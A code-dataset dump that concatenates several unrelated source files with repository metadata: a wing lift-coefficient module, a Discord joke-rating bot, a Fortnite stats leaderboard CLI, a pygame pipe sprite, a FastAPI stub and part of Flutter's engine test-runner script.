install('src/spacegroup/spacegroup', prefix.bin)
install_tree('examples', join_path(prefix, 'examples'))
install_tree('species', join_path(prefix, 'species'))
| 35.511278 | 96 | 0.556638 |
4a2110e2d23810e1a40ee3dc5ad16db0a2672457 | 2,963 | py | Python | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | 9 | 2018-06-10T02:09:22.000Z | 2022-01-11T16:25:55.000Z | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | 3 | 2018-02-26T07:11:59.000Z | 2020-05-08T11:37:18.000Z | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | null | null | null | import numpy as np
from scipy import interpolate
import warnings
def get_CL_CD_free_wing(AR, AoA_deg):
a0 = 2. * np.pi # dCL/d_alfa in 2D [1/rad]
e_w = 0.8 # span efficiency factor, range: 0.8 - 1.0
a = a0 / (1. + a0 / (np.pi * AR * e_w))
CL_expected_3d = a * np.deg2rad(AoA_deg)
CD_ind_expected_3d = CL_expected_3d * CL_expected_3d / (np.pi * AR * e_w)
return CL_expected_3d, CD_ind_expected_3d
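# Editor's worked example (not part of the original module): for AR = 5 and
# AoA = 5 deg, a = 2*pi / (1 + 2*pi/(pi*5*0.8)) ~= 4.189 1/rad, so
# CL ~= 4.189 * 0.0873 ~= 0.366 and CD_ind ~= 0.366**2 / (pi*5*0.8) ~= 0.0106.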
def get_CL_CD_submerged_wing(AR, AoA_deg, K=1, c=0, h=0):
"""
:param AR:
:param AoA_deg:
:param K: coefficient accounting for free surface effects
    on steady lift for an uncambered 2D thin foil at an angle of attack.
CL_with_free_surface_effects = CL * K
CL = 2. * np.pi
:return:
"""
a0 = 2. * np.pi * K # dCL/d_alfa in 2D [1/rad]
e_w = 0.8 # span efficiency factor, range: 0.8 - 1.0
a = a0 / (1. + a0 / (np.pi * AR * e_w))
CL_expected_3d = a * np.deg2rad(AoA_deg)
# CL_expected_3d = AR* 2*np.pi*np.deg2rad(AoA_deg)/(2+np.sqrt(AR*AR+4))
CD_ind_expected_3d = CL_expected_3d * CL_expected_3d / (np.pi * AR * e_w)
return CL_expected_3d, CD_ind_expected_3d
def calc_free_surface_effect_on_CL(Fn, h_over_chord):
"""
    This function returns coefficient 'K' accounting for free surface effects
    on steady lift for an uncambered 2D thin foil at an angle of attack.
Source:
Hough and Moran 1969 (original)
"Hydrodynamics of High-Speed Marine Vehicles" Odd M. Faltinsen, chapter 6.8 p 199
CL_with_free_surface_effects = CL * K
:param Fn: Froude number with h as length parameter
:param h_over_chord: ratio of foil_submerge/MAC
:return:
"""
    # h - foil submerge [m]
# MAC - mean aerodynamic chord [m]
if (h_over_chord > 1.1 or h_over_chord < 0.9):
raise ValueError("no data for foil submerge / foil chord other than 1")
# data below are for hc = h / c = 1
K = [1, 0.72, 0.6, 0.62, 0.65, 0.76, 0.85, 0.9, 0.91, 0.92] # [-] 2D free surface lift correction coefficient
Fnh = [0, 1, 1.5, 2, 2.5, 4, 6, 8, 10, 25] # Froude number with h as parameter
if (Fn < 9):
        warnings.warn("To use mirror vortex modeling technique it is recommended to be in high Froude number regime.")
# source:
# "Hydrodynamics of High-Speed Marine Vehicles" Odd M. Faltinsen, chapter 6.8 p 200
if (Fn > max(Fnh)):
raise ValueError("Fnh is out of interpolation range Fnh = %0.2f", Fn)
fun_handle = interpolate.interp1d(Fnh, K) # use interpolation function returned by `interp1d`
K = fun_handle(Fn)
return K
# import matplotlib.pyplot as plt
# import numpy as np
# xnew = np.linspace(0, 15, num=100)
# ynew = np.array([ calc_CLFreeSurfaceEffect(xnew[i],1) for i in range(len(xnew))])
#
# plt.xlabel('Fn')
# plt.ylabel('K')
# plt.title('Effect of foil submerge on lift')
# plt.plot(xnew, ynew, marker=".", linestyle="-")
# plt.grid(True)
# plt.show() | 32.922222 | 117 | 0.646979 |
4a21115a40bed721b290c8d29fe601c34a6dc43d | 1,148 | py | Python | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | null | null | null | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | 1 | 2021-04-30T00:36:45.000Z | 2021-05-01T00:48:20.000Z | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | null | null | null | from command import Command
import random
from discord import Embed
from discord.message import Message
jokes_answer = [
'Mas o menos tu bromita 7/10',
'¡Oigan todos! Master bromas aqui presente',
'¿Acaso aprendiste de Jucaritas? 10/10',
'Uff +1000 lince',
'Se te cayeron tus zapatos de payaso',
'¿Fue chiste? Pa reirme',
'Bangaran',
'Tatai guambra mushpa',
'Me alegraste el día',
'¡Tu Joke-Fu es realmente impresionante!',
'¿Sacas tus chiste del libreto de Auron Play?',
    'No entendí esa referencia',
'Don comediante'
]
class Test_Joke(Command):
async def on_triggered(self, message: Message):
"""
        Send a random joke-rating answer to the channel as an embed
        :return: None
"""
answer = self.get_answer_to_joke()
await message.channel.send(
embed=self.get_embed(answer)
)
def get_answer_to_joke(self):
return random.choice(jokes_answer)
def get_embed(self, answer: str):
        embed = Embed(
            title=answer,
            description="Un gatito :3")  # discord.Embed takes no 'message' kwarg
return embed
| 24.425532 | 51 | 0.615854 |
4a21124eb385390cd0fa8424e3590ca25ed5785a | 15,352 | py | Python | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | import requests
import config
import json
import re
from time import sleep
from operator import itemgetter
# Solo leaderboards
solo_leaderboards = {}
# These leaderboards will be populated with lists of dictionaries of player
# stats that can then be sorted and displayed
group_leaderboards = {
"LIFETIME STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME SOLO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME DUO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME SQUAD STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON SOLO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON DUO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON SQUAD STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
}
}
field_map_solo = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 10s": "top10",
"Top 25s": "top25",
"Kills": "kills",
"K/D": "kd"
}
field_map_duo = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 5s": "top5",
"Top 12s": "top12",
"Kills": "kills",
"K/D": "kd"
}
field_map_squad = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 3s": "top3",
"Top 6s": "top6",
"Kills": "kills",
"K/D": "kd"
}
group_map = {
"LIFETIME STATS": "lifeTimeStats",
"LIFETIME SOLO STATS": "p2",
"LIFETIME DUO STATS": "p10",
"LIFETIME SQUAD STATS": "p9",
"CURRENT SEASON SOLO STATS": "curr_p2",
"CURRENT SEASON DUO STATS": "curr_p10",
"CURRENT SEASON SQUAD STATS": "curr_p9"
}
input_commands = [
"--exit",
"--players",
"--stats",
"--help",
"--group",
"--remove"
]
# will store raw json data from fortnite tracker for all Players
# format will be { player name : fortnitetracker data }
raw_data = {}
# initialize stuff, right now just goes straight to main menu
def main():
welcome_message()
    # regex-parse the input: we split commands on two delimiters,
# commas and spaces (any number of them)
command = re.split("[, ]+", input("Enter Command: "))
# we only want to exit when --exit is entered as the only command
# the or condition means that we don't accept commands such as
# "--exit rtedsadasd" because the length of the command is > 1
# conditions are only met when command[0] is "--exit" and the
# length is 1
while(command[0] != "--exit" or len(command) > 1):
# display help message
if (command[0] == "--help" and len(command) == 1):
help_message()
# display a list of players currently stored in dictionary
elif (command[0] == '--players' and len(command) == 1):
print("printing a list of players")
for player in solo_leaderboards:
print(player)
# display stats for player with name in command[1], if the player
# is not in the system, query FortniteTracker API. If nothing is
# returned then return an error message. If the player is in the
# system already, pull their existing data (not stored outside of
# runtime so not a big deal)
        elif (command[0] == '--stats' and len(command) == 2):
print("printing stats for " + command[1])
if (add_players(command[1]) == 1):
print_solo_stats(command[1])
# display group leaderboards based on input parameters
elif (command[0] == '--group'):
            # using lazy evaluation here to prevent errors
if (len(command) > 1 and command[1] == '--players'):
if (len(command) > 2 and command[2] == '--remove'):
group = list(solo_leaderboards)
if (group == []):
print("No players to remove")
else:
#for key in solo_leaderboards.keys():
#group.append(key)
for i in range (3, len(command)):
if (command[i] in group):
group.remove(command[i])
else:
print(command[i] + " is not being stored")
print_group_stats(group)
elif (len(command) == 2 and command[1] == '--players'):
print_group_stats_all()
else:
print("Invalid command, enter '--help' for valid commands")
else:
group = []
for i in range (1, len(command)):
if (add_players(command[i]) == 1):
group.append(command[i])
print_group_stats(group)
        # remove a player's data from storage; not sure why this would be
# super useful because data is not stored outside of runtime but
# good to have the option
elif (command[0] == '--remove'):
for i in range (1, len(command)):
if (command[i] not in solo_leaderboards):
print(command[i] + " is not being stored")
else:
remove_from_solo(command[i])
remove_from_group(command[i])
# if the first input is not a valid command, display an error message
else:
#if (command[0] not in input_commands):
print("Invalid command, enter '--help' for valid commands")
#print(command)
command = re.split("[, ]+", input("Enter Command: "))
# Message that the user sees on startup
def welcome_message():
print("Welcome to Fortnite Enhanced Leaderboards by James Nicol")
print("Enter '--help' for a list of commands")
# help message to explain all available commands with examples
def help_message():
print("Commands:")
print("\n##############################################################\n")
print("'--exit' - Exit the program")
print("\n##############################################################\n")
print("'--players' - view a list of all players current stored", end = "")
print("in the system")
print("\n##############################################################\n")
print("'--stats p_name' - Display stats for player with username p_name")
print("\n##############################################################\n")
print("'--group p_n1, p_n2' - Display group leaderboards ", end = "")
print("for 1 or more players, in this case p_n1 and p_n2")
print("\n##############################################################\n")
print("'--group --players' - Display group leaderboards for all ", end = "")
print("players current stored in the system")
print("\n##############################################################\n")
print("'--remove p_n1, p_n2' - Remove one or more players from ", end = "")
print("the system, in this case p_n1 and p_n2")
print("\n##############################################################\n")
print("'--group --players --remove p_n1' - Display group ", end = "")
print("leaderboards for all players current stored in the ", end = "")
print("system except for p_n1")
print("NOTE: This command does not remove p_n1 from the system")
print("\n##############################################################\n")
# add one or more players' data to the leaderboards, querying FortniteTracker as needed
def add_players(names):
names = names.replace(" ", "")
name = names.split(",")
#print(name)
for username in name:
request_string = "https://api.fortnitetracker.com/v1/profile/pc/" + username
response = requests.get(request_string, headers = config.headers)
#print(response.text)
data = response.json()
#print(username)
if ('error' in data and data['error'] == "Player Not Found"):
print(username + " is not a valid name")
return 0
else:
if(username not in solo_leaderboards):
populate_solo_leaderboards(username, data)
populate_group_leaderboards(username, data)
#print_solo_stats(username)
sleep(1)
else:
print(username + " already exists")
return 1
# populate the group leaderboard dictionary
def populate_solo_leaderboards(username, data):
print("populating leaderboards for " + username)
raw_data[username] = data
solo_leaderboards[username] = {}
if ("lifetimeStats" in data):
lifetime_stats = data["lifeTimeStats"]
solo_leaderboards[username]["LIFETIME STATS"] = {
"Matches Played": lifetime_stats[7]["value"],
"Wins": lifetime_stats[8]["value"],
"Win %": lifetime_stats[9]["value"].strip("%"),
"Kills": lifetime_stats[10]["value"],
"K/D": lifetime_stats[11]["value"]
}
for key in group_map.keys():
if (key != "LIFETIME STATS"):
if(group_map[key] in data["stats"]):
solo_leaderboards[username][key] = {}
if (group_map[key] == "p2" or group_map[key] == "curr_p2"):
for fields in field_map_solo:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_solo[fields]]["value"]
elif (group_map[key] == "p10" or group_map[key] == "curr_p10"):
for fields in field_map_duo:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_duo[fields]]["value"]
elif (group_map[key] == "p9" or group_map[key] == "curr_p9"):
for fields in field_map_squad:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_squad[fields]]["value"]
# print the solo stats for a given username
def print_solo_stats(username):
for headers in solo_leaderboards[username]:
print(headers)
for keys, values in solo_leaderboards[username][headers].items():
print(keys + ": " + values)
def populate_group_leaderboards(username, data):
# add the new member
# Need to add lifetime stats separately because they are not indexed the
# same way in the data json that we receive from FortniteTracker
group_leaderboards["LIFETIME STATS"]["Matches Played"].append({"name" : username, "value" : int(data["lifeTimeStats"][7]["value"])})
group_leaderboards["LIFETIME STATS"]["Wins"].append({"name" : username, "value" : int(data["lifeTimeStats"][8]["value"])})
group_leaderboards["LIFETIME STATS"]["Win %"].append({"name": username, "value": float(data["lifeTimeStats"][9]["value"].strip("%"))})
group_leaderboards["LIFETIME STATS"]["Kills"].append({"name": username, "value": int(data["lifeTimeStats"][10]["value"])})
group_leaderboards["LIFETIME STATS"]["K/D"].append({"name": username, "value": float(data["lifeTimeStats"][11]["value"])})
#print(group_leaderboards)
# For all other stats we can automate the collection using a mapping of
# our labels to the data labels
for key in group_map.keys():
if (key != "LIFETIME STATS"):
if (group_map[key] in data["stats"]):
group_leaderboards[key]["Matches Played"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["matches"]["value"])
})
group_leaderboards[key]["Wins"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["top1"]["value"])
})
group_leaderboards[key]["Win %"].append({
"name": username,
"value": float(data["stats"][group_map[key]]["winRatio"]["value"])
})
group_leaderboards[key]["Kills"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["kills"]["value"])
})
group_leaderboards[key]["K/D"].append({
"name": username,
"value": float(data["stats"][group_map[key]]["kd"]["value"])
})
#print(group_leaderboards)
    # sort the group leaderboards (descending) for every tracked stat
    for key in group_map.keys():
        for stat in ("Matches Played", "Wins", "Win %", "Kills", "K/D"):
            group_leaderboards[key][stat] = sorted(
                group_leaderboards[key][stat],
                key=itemgetter('value'),
                reverse=True
            )
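# Editor's illustration (not part of the original file): after population, each
# leaderboard list holds per-player dicts sorted by value, e.g.
#   group_leaderboards["LIFETIME STATS"]["Wins"]
#   -> [{'name': 'player_a', 'value': 311}, {'name': 'player_b', 'value': 87}]
# (player names and values here are made up for illustration).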
def print_group_stats(usernames):
for headers in group_leaderboards:
print(headers)
for keys, values in group_leaderboards[headers].items():
print(keys)
for element in values:
if (element["name"] in usernames):
print(element["name"] + ": " + str(element["value"]))
def print_group_stats_all():
for headers in group_leaderboards:
print(headers)
for keys, values in group_leaderboards[headers].items():
print(keys)
for element in values:
print(element["name"] + ": " + str(element["value"]))
def remove_from_solo(user):
#remove user from solo leaderboards
del solo_leaderboards[user]
def remove_from_group(user):
    # remove user from group leaderboards (filter out every entry for the name)
    for headers in group_leaderboards:
        for keys in group_leaderboards[headers]:
            group_leaderboards[headers][keys] = [
                entry for entry in group_leaderboards[headers][keys]
                if entry['name'] != user
            ]
#program runs here
if __name__ == '__main__':
main()
# Next Steps
# Error checking
# Command line commands
# Output formatting
# KNOWN ISSUES
# if the user hasn't played in the current season, they have no stats for curr_p2
| 37.812808 | 138 | 0.536152 |
4a2112bf7ac96fb04c7a2552160ade4f762a5768 | 203 | py | Python | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | 3 | 2018-07-30T01:39:25.000Z | 2021-07-08T16:50:17.000Z | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | null | null | null | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | 1 | 2021-07-08T17:01:08.000Z | 2021-07-08T17:01:08.000Z | CHUNKS_PATH = "data/chunks"
SCRAPPED_VIDEOS = "data/scrapped_videos"
CHUNKS_SCRAPPED_VIDEOS = "data/chunks_scrapped_videos"
CHUNKS_SCRAPPED_VIDEOS_AUDIO = "data/chunks_scrapped_videos_audio"
OUT_FPS = 24 | 40.6 | 66 | 0.847291 |
4a21145fa14be10a2349065703ab83c5aec7a6ce | 180 | py | Python | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | """Friendly messages"""
from fastapi import APIRouter
router = APIRouter()
@router.get('/hello')
async def hello():
"""You look like a whole clown right now. 🤡"""
    # editor's completion of the original `pass` stub (assumed intent: return the message)
    return {"message": "You look like a whole clown right now. 🤡"} | 16.363636 | 50 | 0.661111 |
4a21167b24372af2437f66b8d6a7b198cc5f6996 | 1,448 | py | Python | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | import pygame as pg
class Pipes(pg.sprite.Sprite):
def __init__(self, pos, *groups):
self.groups = groups[0], groups[1]
self.bird = groups[2]
pg.sprite.Sprite.__init__(self, self.groups)
upper_colon = pg.image.load('pipe-green.png').convert_alpha()
lower_colon = pg.transform.flip(upper_colon, 0, 1).convert_alpha()
upper_colon_rect = upper_colon.get_rect()
lower_colon_rect = upper_colon.get_rect()
vertical_gap = 150
self.image = pg.Surface(
(upper_colon_rect.width, upper_colon_rect.height + upper_colon_rect.height + vertical_gap))
self.image.blit(lower_colon, (0, 0))
self.image.blit(upper_colon, (0, upper_colon_rect.height + vertical_gap))
self.image.set_colorkey((0, 0, 0))
self.image.convert_alpha()
self.mask = pg.mask.from_surface(self.image)
del upper_colon_rect
del lower_colon_rect
del upper_colon
del lower_colon
self.rect = self.image.get_rect()
self.pos = pos.copy()
self.rect.center = self.pos
def update(self, time):
self.pos[0] -= 100 * time
collided = pg.sprite.spritecollide(self, self.bird, False, pg.sprite.collide_mask)
        if collided:
            quit()  # any mask-level hit with the bird ends the game
if self.rect.right < 0:
self.kill()
self.rect.center = self.pos
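# Editor's usage sketch (assumption: not part of the original file). Pipes joins
# the first two groups and collision-tests against the third (the bird group):
#   sprites, pipes, birds = pg.sprite.Group(), pg.sprite.Group(), pg.sprite.Group()
#   Pipes([400, 300], sprites, pipes, birds)
#   ...then each frame: sprites.update(dt_seconds)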
| 30.166667 | 104 | 0.601519 |
4a21171e2dac8cede114d31e9dda2761f0a3213b | 19,288 | py | Python | testing/run_tests.py | rmarianetti/engine | 33ba62960b78b86899807bafa0361e6bdffc65ea | [
"BSD-3-Clause"
] | 1 | 2019-04-21T12:35:21.000Z | 2019-04-21T12:35:21.000Z | testing/run_tests.py | duanqz/engine | 30063a97ea4a71839411b6488baad13cac41748d | [
"BSD-3-Clause"
] | null | null | null | testing/run_tests.py | duanqz/engine | 30063a97ea4a71839411b6488baad13cac41748d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright 2013 The Flutter Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A top level harness to run all unit-tests in a specific engine build.
"""
import argparse
import glob
import os
import re
import subprocess
import sys
import time
buildroot_dir = os.path.abspath(os.path.join(os.path.realpath(__file__), '..', '..', '..'))
out_dir = os.path.join(buildroot_dir, 'out')
golden_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'resources')
fonts_dir = os.path.join(buildroot_dir, 'flutter', 'third_party', 'txt', 'third_party', 'fonts')
roboto_font_path = os.path.join(fonts_dir, 'Roboto-Regular.ttf')
dart_tests_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'dart',)
font_subset_dir = os.path.join(buildroot_dir, 'flutter', 'tools', 'font-subset')
fml_unittests_filter = '--gtest_filter=-*TimeSensitiveTest*'
def PrintDivider(char='='):
print '\n'
for _ in xrange(4):
print(''.join([char for _ in xrange(80)]))
print '\n'
def RunCmd(cmd, **kwargs):
command_string = ' '.join(cmd)
PrintDivider('>')
print 'Running command "%s"' % command_string
start_time = time.time()
process = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, **kwargs)
process.communicate()
end_time = time.time()
if process.returncode != 0:
PrintDivider('!')
raise Exception('Command "%s" exited with code %d' % (command_string, process.returncode))
PrintDivider('<')
print 'Command run successfully in %.2f seconds: %s' % (end_time - start_time, command_string)
def IsMac():
return sys.platform == 'darwin'
def IsLinux():
return sys.platform.startswith('linux')
def IsWindows():
return sys.platform.startswith(('cygwin', 'win'))
def ExecutableSuffix():
return '.exe' if IsWindows() else ''
def FindExecutablePath(path):
if os.path.exists(path):
return path
if IsWindows():
exe_path = path + '.exe'
if os.path.exists(exe_path):
return exe_path
bat_path = path + '.bat'
if os.path.exists(bat_path):
return bat_path
raise Exception('Executable %s does not exist!' % path)
def RunEngineExecutable(build_dir, executable_name, filter, flags=[], cwd=buildroot_dir):
if filter is not None and executable_name not in filter:
print('Skipping %s due to filter.' % executable_name)
return
executable = FindExecutablePath(os.path.join(build_dir, executable_name))
print('Running %s in %s' % (executable_name, cwd))
test_command = [ executable ] + flags
print(' '.join(test_command))
RunCmd(test_command, cwd=cwd)
def RunCCTests(build_dir, filter):
print("Running Engine Unit-tests.")
# Not all of the engine unit tests are designed to be run more than once.
non_repeatable_shuffle_flags = [
"--gtest_shuffle",
]
shuffle_flags = non_repeatable_shuffle_flags + [
"--gtest_repeat=2",
]
RunEngineExecutable(build_dir, 'client_wrapper_glfw_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'common_cpp_core_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'common_cpp_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'client_wrapper_unittests', filter, shuffle_flags)
# https://github.com/flutter/flutter/issues/36294
if not IsWindows():
RunEngineExecutable(build_dir, 'embedder_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'embedder_proctable_unittests', filter, shuffle_flags)
else:
RunEngineExecutable(build_dir, 'flutter_windows_unittests', filter, non_repeatable_shuffle_flags)
RunEngineExecutable(build_dir, 'client_wrapper_windows_unittests', filter, shuffle_flags)
flow_flags = ['--gtest_filter=-PerformanceOverlayLayer.Gold']
if IsLinux():
flow_flags = [
'--golden-dir=%s' % golden_dir,
'--font-file=%s' % roboto_font_path,
]
RunEngineExecutable(build_dir, 'flow_unittests', filter, flow_flags + shuffle_flags)
# TODO(44614): Re-enable after https://github.com/flutter/flutter/issues/44614 has been addressed.
# RunEngineExecutable(build_dir, 'fml_unittests', filter, [ fml_unittests_filter ] + shuffle_flags)
RunEngineExecutable(build_dir, 'runtime_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'tonic_unittests', filter, shuffle_flags)
if not IsWindows():
# https://github.com/flutter/flutter/issues/36295
RunEngineExecutable(build_dir, 'shell_unittests', filter, shuffle_flags)
# https://github.com/google/googletest/issues/2490
RunEngineExecutable(build_dir, 'android_external_view_embedder_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'jni_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'platform_view_android_delegate_unittests', filter, shuffle_flags)
# The image release unit test can take a while on slow machines.
RunEngineExecutable(build_dir, 'ui_unittests', filter, shuffle_flags + ['--timeout=90'])
RunEngineExecutable(build_dir, 'testing_unittests', filter, shuffle_flags)
# The accessibility library only supports Mac for now.
if IsMac():
RunEngineExecutable(build_dir, 'accessibility_unittests', filter, shuffle_flags)
# These unit-tests are Objective-C and can only run on Darwin.
if IsMac():
RunEngineExecutable(build_dir, 'flutter_channels_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'flutter_desktop_darwin_unittests', filter, non_repeatable_shuffle_flags)
# https://github.com/flutter/flutter/issues/36296
if IsLinux():
RunEngineExecutable(build_dir, 'txt_unittests', filter, shuffle_flags)
if IsLinux():
RunEngineExecutable(build_dir, 'flutter_linux_unittests', filter, non_repeatable_shuffle_flags)
RunEngineExecutable(build_dir, 'flutter_glfw_unittests', filter, non_repeatable_shuffle_flags)
def RunEngineBenchmarks(build_dir, filter):
print("Running Engine Benchmarks.")
RunEngineExecutable(build_dir, 'shell_benchmarks', filter)
RunEngineExecutable(build_dir, 'fml_benchmarks', filter)
RunEngineExecutable(build_dir, 'ui_benchmarks', filter)
if IsLinux():
RunEngineExecutable(build_dir, 'txt_benchmarks', filter)
def SnapshotTest(build_dir, dart_file, kernel_file_output, verbose_dart_snapshot):
print("Generating snapshot for test %s" % dart_file)
dart = os.path.join(build_dir, 'dart-sdk', 'bin', 'dart')
frontend_server = os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot')
flutter_patched_sdk = os.path.join(build_dir, 'flutter_patched_sdk')
test_packages = os.path.join(dart_tests_dir, '.packages')
assert os.path.exists(dart)
assert os.path.exists(frontend_server)
assert os.path.exists(flutter_patched_sdk)
assert os.path.exists(test_packages)
snapshot_command = [
dart,
frontend_server,
'--enable-experiment=non-nullable',
'--no-sound-null-safety',
'--sdk-root',
flutter_patched_sdk,
'--incremental',
'--target=flutter',
'--packages',
test_packages,
'--output-dill',
kernel_file_output,
dart_file
]
if verbose_dart_snapshot:
RunCmd(snapshot_command, cwd=buildroot_dir)
else:
try:
subprocess.check_output(snapshot_command, cwd=buildroot_dir)
except subprocess.CalledProcessError as error:
# CalledProcessError's string doesn't print the output. Print it before
# the crash for easier inspection.
print('Error occurred from the subprocess, with the output:')
print(error.output)
raise
assert os.path.exists(kernel_file_output)
def RunDartTest(build_dir, dart_file, verbose_dart_snapshot, multithreaded, enable_observatory=False):
kernel_file_name = os.path.basename(dart_file) + '.kernel.dill'
kernel_file_output = os.path.join(out_dir, kernel_file_name)
SnapshotTest(build_dir, dart_file, kernel_file_output, verbose_dart_snapshot)
command_args = []
if not enable_observatory:
command_args.append('--disable-observatory')
command_args += [
'--use-test-fonts',
kernel_file_output
]
if multithreaded:
threading = 'multithreaded'
command_args.insert(0, '--force-multithreading')
else:
threading = 'single-threaded'
print("Running test '%s' using 'flutter_tester' (%s)" % (kernel_file_name, threading))
RunEngineExecutable(build_dir, 'flutter_tester', None, command_args)
def RunPubGet(build_dir, directory):
print("Running 'pub get' in the tests directory %s" % dart_tests_dir)
pub_get_command = [
os.path.join(build_dir, 'dart-sdk', 'bin', 'pub'),
'get'
]
RunCmd(pub_get_command, cwd=directory)
def EnsureDebugUnoptSkyPackagesAreBuilt():
variant_out_dir = os.path.join(out_dir, 'host_debug_unopt')
ninja_command = [
'autoninja',
'-C',
variant_out_dir,
'flutter/sky/packages'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(variant_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--runtime-mode',
'debug',
'--unopt',
'--no-lto',
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def EnsureJavaTestsAreBuilt(android_out_dir):
"""Builds the engine variant and the test jar containing the JUnit tests"""
ninja_command = [
'autoninja',
'-C',
android_out_dir,
'flutter/shell/platform/android:robolectric_tests'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(android_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
assert android_out_dir != "out/android_debug_unopt", "%s doesn't exist. Run GN to generate the directory first" % android_out_dir
# Otherwise prepare the directory first, then build the test.
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--android',
'--unoptimized',
'--runtime-mode=debug',
'--no-lto',
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def EnsureIosTestsAreBuilt(ios_out_dir):
"""Builds the engine variant and the test dylib containing the XCTests"""
ninja_command = [
'autoninja',
'-C',
ios_out_dir,
'ios_test_flutter'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(ios_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
assert ios_out_dir != "out/ios_debug_sim_unopt", "%s doesn't exist. Run GN to generate the directory first" % ios_out_dir
# Otherwise prepare the directory first, then build the test.
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--ios',
'--unoptimized',
'--runtime-mode=debug',
'--no-lto',
'--simulator'
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def AssertExpectedJavaVersion():
"""Checks that the user has Java 8 which is the supported Java version for Android"""
EXPECTED_VERSION = '1.8'
# `java -version` is output to stderr. https://bugs.java.com/bugdatabase/view_bug.do?bug_id=4380614
